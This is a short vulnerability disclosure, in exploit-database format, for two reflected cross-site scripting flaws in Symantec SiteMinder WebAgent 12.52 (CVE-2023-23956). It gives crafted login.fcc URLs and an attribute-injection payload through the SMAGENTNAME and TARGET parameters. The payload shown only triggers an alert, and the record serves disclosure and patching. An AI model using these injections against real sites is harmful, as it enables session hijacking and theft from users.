    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Tag

#windows